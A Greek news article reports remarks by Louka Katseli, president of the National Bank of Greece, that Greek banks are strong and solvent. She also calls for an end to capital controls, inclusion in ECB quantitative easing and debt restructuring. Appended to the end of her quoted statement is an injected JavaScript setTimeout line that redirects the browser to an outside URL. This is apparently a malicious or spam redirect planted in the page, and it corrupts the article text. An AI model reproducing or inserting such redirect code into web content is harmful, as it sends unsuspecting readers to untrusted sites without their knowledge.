Κατσέλη: Οι τράπεζες στη χώρα μας είναι ισχυρές και φερέγγυες

0
6

 

Μιλώντας στην Ευρωαραβική Σύνοδο η προεδρος της Εθνικής Τράπεζας Λούκα Κατσέλη τόνισε πως «οι τράπεζες στη χώρα μας, μετά και την τελευταία επιτυχημένη ανακεφαλαιοποίηση, είναι ισχυρές και φερέγγυες και έτοιμες να ανταποκριθούν στο μεγάλο αναπτυξιακό στοίχημα της Ελλάδας για ενίσχυση των επενδύσεων και της εξωστρέφειας».

Η κ. Κατσέλη αναφέρθηκε στις σημαντικές προκλήσεις που αντιμετωπίζουν οι τράπεζες σήμερα και, ειδικότερα, την αποκατάσταση της εμπιστοσύνης στο τραπεζικό σύστημα για την ενίσχυση της φερεγγυότητας των τραπεζών, τη σταδιακή επάνοδο καταθέσεων και, επομένως, τη βελτίωση της ρευστότητας στην πραγματική οικονομία.

«Στο πλαίσιο αυτό, πιστεύω προσωπικά ότι θα πρέπει το γρηγορότερο δυνατόν να αρθούν οι περιορισμοί στην κίνηση κεφαλαίων, να ενταχθεί η Ελλάδα στο πρόγραμμα ποσοτικής χαλάρωσης της ΕΚΤ, αλλά και να υπάρξει οριστική διευθέτηση για την απαραίτητη αναδιάρθρωση χρέους, ώστε να «σπάσει» ο αυτοτροφοδοτούμενος κύκλος αβεβαιότητας και έλλειψης εμπιστοσύνης προς το τραπεζικό σύστημα, που, σήμερα, τουλάχιστον εδράζεται σε ψυχολογικά κατά βάση κίνητρα» είπε η πρόεδρος της Εθνικής Τράπεζας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here